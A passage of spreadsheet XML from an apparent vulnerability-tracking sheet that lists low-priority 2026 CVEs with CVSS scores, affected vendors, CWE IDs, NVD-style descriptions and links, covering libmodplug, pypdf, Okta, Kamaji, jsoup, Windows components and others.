          <t>libmodplug through 0.8.9.1 contains an out-of-bounds read in pat_smplooped in src/load_pat.cpp. The function validates only the upper bound of its sample index against MAXSMP and then subtracts one before indexing the 191-byte static array pat_loops, so an index of zero reads pat_loops[-1], one byte before the array. The index is the smpno field of a parsed MIDI event, which is initialised to zero and only later overwritten from a program-change parameter, so an event reaching the note test before an instrument is assigned carries zero. A 32-byte MIDI file supplied to the library's public ModPlug_Load entry point drives the path through CSoundFile::Create, CSoundFile::ReadMID, and MID_ReadPatterns to the read. The byte read out of bounds determines whether a note event is treated as looping, so adjacent static storage influences playback state.</t>
        </is>
      </c>
      <c r="M2151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75904</t>
        </is>
      </c>
    </row>
    <row r="2152">
      <c r="A2152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78560</t>
        </is>
      </c>
      <c r="C2152" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2152" s="5" t="inlineStr"/>
      <c r="F2152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2152" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H2152" s="5" t="inlineStr"/>
      <c r="I2152" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2152" s="5" t="inlineStr"/>
      <c r="K2152" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2152" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway includes an optional pass-through authentication source that accepts user identity from a client-supplied HTTP header without cryptographic validation. In architectures where this optional source is enabled without an upstream reverse proxy or firewall configured to sanitize and enforce client headers, an unauthenticated user can supply an arbitrary identity value to initiate a session.</t>
        </is>
      </c>
      <c r="M2152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t>
        </is>
      </c>
    </row>
    <row r="2153">
      <c r="A2153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84310</t>
        </is>
      </c>
      <c r="C2153" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2153" s="5" t="inlineStr"/>
      <c r="F2153" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2153" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2153" s="5" t="inlineStr"/>
      <c r="I2153" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2153" s="5" t="inlineStr"/>
      <c r="K2153" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-834</t>
        </is>
      </c>
      <c r="L2153" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.1, an attacker can craft a PDF that causes pypdf/_doc_common.py _get_outline to consume long runtimes and large amounts of memory when retrieving document outlines with large numbers of entries or deeply nested reused paths because the traversal lacked global entry-count and nesting-depth limits. This issue is fixed in version 6.16.1.</t>
        </is>
      </c>
      <c r="M2153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84310</t>
        </is>
      </c>
    </row>
    <row r="2154">
      <c r="A2154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84311</t>
        </is>
      </c>
      <c r="C2154" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2154" s="5" t="inlineStr"/>
      <c r="F2154" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2154" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2154" s="5" t="inlineStr"/>
      <c r="I2154" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J2154" s="5" t="inlineStr"/>
      <c r="K2154" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="L2154" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.1, an attacker can craft a PDF that causes pypdf/_page.py PageObject._extract_text and PageObject.extract_xform_text to traverse a directed acyclic graph of reused form XObjects in which each form invokes a child multiple times, creating exponentially many traversal paths and causing long runtimes and large memory consumption. This issue is fixed in version 6.16.1.</t>
        </is>
      </c>
      <c r="M2154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84311</t>
        </is>
      </c>
    </row>
    <row r="2155">
      <c r="A2155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85541</t>
        </is>
      </c>
      <c r="C2155" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2155" s="5" t="inlineStr"/>
      <c r="F2155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2155" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2155" s="5" t="inlineStr"/>
      <c r="I2155" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2155" s="5" t="inlineStr"/>
      <c r="K2155" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2155" s="5" t="inlineStr">
        <is>
          <t>DreamMaker developed by Interinfo has a Reflected Cross-site Scripting vulnerability. Authenticated remote attackers can execute arbitrary JavaScript codes in user's browser via a malicious website.</t>
        </is>
      </c>
      <c r="M2155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85541</t>
        </is>
      </c>
    </row>
    <row r="2156">
      <c r="A2156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88038</t>
        </is>
      </c>
      <c r="C2156" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D2156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2156" s="5" t="inlineStr"/>
      <c r="F2156" s="5" t="inlineStr"/>
      <c r="G2156" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2156" s="5" t="inlineStr"/>
      <c r="I2156" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2156" s="5" t="inlineStr"/>
      <c r="K2156" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L2156" s="5" t="inlineStr">
        <is>
          <t>cookies is a Node.js library for reading and writing HTTP cookies, used by Koa via ctx.cookies. In versions before 0.9.2 the library validates the cookie name and value against character sets that reject the semicolon separator, but the domain and path options are checked only against a permissive RFC 7230 field-content matcher that allows semicolons, and both are written into the Set-Cookie header unescaped. An application that passes untrusted or request-derived data into the domain or path option can therefore inject additional cookie attributes, overriding SameSite, Secure, HttpOnly, or Domain on the cookies the application issues. This is a Set-Cookie attribute injection issue (CWE-74). The issue is fixed in cookies 0.9.2, which validates domain and path against RFC 6265 character sets. As a workaround, keep domain and path application-set rather than derived from untrusted input.</t>
        </is>
      </c>
      <c r="M2156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88038</t>
        </is>
      </c>
    </row>
    <row r="2157">
      <c r="A2157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18567</t>
        </is>
      </c>
      <c r="C2157" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2157" s="5" t="inlineStr"/>
      <c r="F2157" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2157" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H2157" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="I2157" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2157" s="5" t="inlineStr"/>
      <c r="K2157" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L2157" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a local attacker to obtain information due to a race condition involving a predictable Unix domain socket path in a world-writable directory.</t>
        </is>
      </c>
      <c r="M2157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18567</t>
        </is>
      </c>
    </row>
    <row r="2158">
      <c r="A2158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62845</t>
        </is>
      </c>
      <c r="C2158" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2158" s="5" t="inlineStr"/>
      <c r="F2158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2158" s="5" t="inlineStr">
        <is>
          <t>kubernetes, postgresql, mysql</t>
        </is>
      </c>
      <c r="H2158" s="5" t="inlineStr"/>
      <c r="I2158" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J2158" s="5" t="inlineStr"/>
      <c r="K2158" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L2158" s="5" t="inlineStr">
        <is>
          <t>Kamaji is the Hosted Control Plane Manager for Kubernetes. Prior to 26.7.4-edge, the PostgreSQL and MySQL datastore drivers build DDL statements by interpolating the user-supplied DataStoreUsername/DataStoreSchema directly into SQL via fmt.Sprintf, without escaping identifiers. These fields have no format validation, so a value containing a quote character breaks out of the quoted identifier — SQL injection executed over Kamaji's root connection to the shared datastore. etcd driver is not affected.This issue is fixed in version 26.7.4-edge.</t>
        </is>
      </c>
      <c r="M2158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62845</t>
        </is>
      </c>
    </row>
    <row r="2159">
      <c r="A2159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64373</t>
        </is>
      </c>
      <c r="C2159" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2159" s="5" t="inlineStr"/>
      <c r="F2159" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2159" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2159" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2159" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2159" s="5" t="inlineStr"/>
      <c r="K2159" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2159" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: Fix hotplug-suspend race during reboot
During system reboot, cpufreq_suspend() is called via the
kernel_restart() -&gt; device_shutdown() path. Unlike the normal system
suspend path, the reboot path does not call freeze_processes(), so
userspace processes and kernel threads remain active.
This allows CPU hotplug operations to run concurrently with
cpufreq_suspend(). The original code has no synchronization with CPU
hotplug, leading to a race condition where governor_data can be freed
by the hotplug path while cpufreq_suspend() is still accessing it,
resulting in a null pointer dereference:
  Unable to handle kernel NULL pointer dereference
  Call Trace:
   do_kernel_fault+0x28/0x3c
   cpufreq_suspend+0xdc/0x160
   device_shutdown+0x18/0x200
   kernel_restart+0x40/0x80
   arm64_sys_reboot+0x1b0/0x200
Fix this by adding cpus_read_lock()/cpus_read_unlock() to
cpufreq_suspend() to block CPU hotplug operations while suspend is in
progress.
[ rjw: Changelog edits ]</t>
        </is>
      </c>
      <c r="M2159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64373</t>
        </is>
      </c>
    </row>
    <row r="2160">
      <c r="A2160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="C2160" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2160" s="5" t="inlineStr"/>
      <c r="F2160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2160" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2160" s="5" t="inlineStr"/>
      <c r="I2160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2160" s="5" t="inlineStr"/>
      <c r="K2160" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2160" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="2161">
      <c r="A2161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68891</t>
        </is>
      </c>
      <c r="C2161" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2161" s="5" t="inlineStr"/>
      <c r="F2161" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2161" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2161" s="5" t="inlineStr"/>
      <c r="I2161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2161" s="5" t="inlineStr"/>
      <c r="K2161" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2161" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t>
        </is>
      </c>
    </row>
    <row r="2162">
      <c r="A2162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69316</t>
        </is>
      </c>
      <c r="C2162" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2162" s="5" t="inlineStr"/>
      <c r="F2162" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2162" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2162" s="5" t="inlineStr"/>
      <c r="I2162" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2162" s="5" t="inlineStr"/>
      <c r="K2162" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2162" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t>
        </is>
      </c>
    </row>
    <row r="2163">
      <c r="A2163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69425</t>
        </is>
      </c>
      <c r="C2163" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2163" s="5" t="inlineStr"/>
      <c r="F2163" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2163" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2163" s="5" t="inlineStr"/>
      <c r="I2163" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2163" s="5" t="inlineStr"/>
      <c r="K2163" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2163" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M2163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t>
        </is>
      </c>
    </row>
    <row r="2164">
      <c r="A2164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69483</t>
        </is>
      </c>
      <c r="C2164" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2164" s="5" t="inlineStr"/>
      <c r="F2164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2164" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2164" s="5" t="inlineStr"/>
      <c r="I2164" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2164" s="5" t="inlineStr"/>
      <c r="K2164" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2164" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t>
        </is>
      </c>
    </row>
    <row r="2165">
      <c r="A2165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69771</t>
        </is>
      </c>
      <c r="C2165" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2165" s="5" t="inlineStr"/>
      <c r="F2165" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2165" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2165" s="5" t="inlineStr"/>
      <c r="I2165" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2165" s="5" t="inlineStr"/>
      <c r="K2165" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2165" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M2165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t>
        </is>
      </c>
    </row>
    <row r="2166">
      <c r="A2166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69792</t>
        </is>
      </c>
      <c r="C2166" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2166" s="5" t="inlineStr"/>
      <c r="F2166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2166" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2166" s="5" t="inlineStr"/>
      <c r="I2166" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2166" s="5" t="inlineStr"/>
      <c r="K2166" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2166" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M2166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t>
        </is>
      </c>
    </row>
    <row r="2167">
      <c r="A2167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="C2167" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2167" s="5" t="inlineStr"/>
      <c r="F2167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2167" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2167" s="5" t="inlineStr"/>
      <c r="I2167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2167" s="5" t="inlineStr"/>
      <c r="K2167" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L2167" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="2168">
      <c r="A2168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="C2168" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2168" s="5" t="inlineStr"/>
      <c r="F2168" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2168" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2168" s="5" t="inlineStr"/>
      <c r="I2168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2168" s="5" t="inlineStr"/>
      <c r="K2168" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2168" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M2168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="2169">
      <c r="A2169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71497</t>
        </is>
      </c>
      <c r="C2169" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2169" s="5" t="inlineStr"/>
      <c r="F2169" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2169" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2169" s="5" t="inlineStr"/>
      <c r="I2169" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2169" s="5" t="inlineStr"/>
      <c r="K2169" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2169" s="5" t="inlineStr">
        <is>
          <t>jsoup is a Java library for working with real-world HTML. From 1.14.3 until 1.23.1, jsoup's HTML parser could incorrectly handle a malformed tag name ending in a control character, causing the tag to acquire the parsing behavior of a different element. When a custom Safelist permits certain raw-text elements, this misparsing can cause content that should remain inert text to be emitted as active markup after serialization, potentially resulting in cross-site scripting. jsoup's built-in Safelists are not affected. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M2169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71497</t>
        </is>
      </c>
    </row>
    <row r="2170">
      <c r="A2170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72931</t>
        </is>
      </c>
      <c r="C2170" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2170" s="5" t="inlineStr"/>
      <c r="F2170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2170" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2170" s="5" t="inlineStr"/>
      <c r="I2170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2170" s="5" t="inlineStr"/>
      <c r="K2170" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="L2170" s="5" t="inlineStr">
        <is>
          <t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="M2170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t>
        </is>
      </c>
    </row>
    <row r="2171">
      <c r="A2171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87602</t>
        </is>
      </c>
      <c r="C2171" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D2171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2171" s="5" t="inlineStr"/>
      <c r="F2171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2171" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2171" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I2171" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2171" s="5" t="inlineStr"/>
      <c r="K2171" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2171" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M2171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87602</t>
        </is>
      </c>
    </row>
    <row r="2172">
      <c r="A2172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18741</t>
        </is>
      </c>
      <c r="C2172" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D2172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2172" s="5" t="inlineStr"/>
      <c r="F2172" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2172" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2172" s="5" t="inlineStr"/>
      <c r="I2172" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2172" s="5" t="inlineStr"/>
      <c r="K2172" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2172" s="5" t="inlineStr">
        <is>
          <t>Worksuite SaaS versions prior to 6.0.14 contains a stored cross-site scripting vulnerability in the Asset Management module that allows authenticated administrators to inject arbitrary JavaScript by entering malicious payloads into the Location and Description fields when creating a new asset. Attackers can store crafted HTML script tags in the application database that execute automatically in the browsers of any user who views the affected asset, potentially leading to session hijacking, credential theft, and unauthorized actions on behalf of authenticated users.</t>
        </is>
      </c>
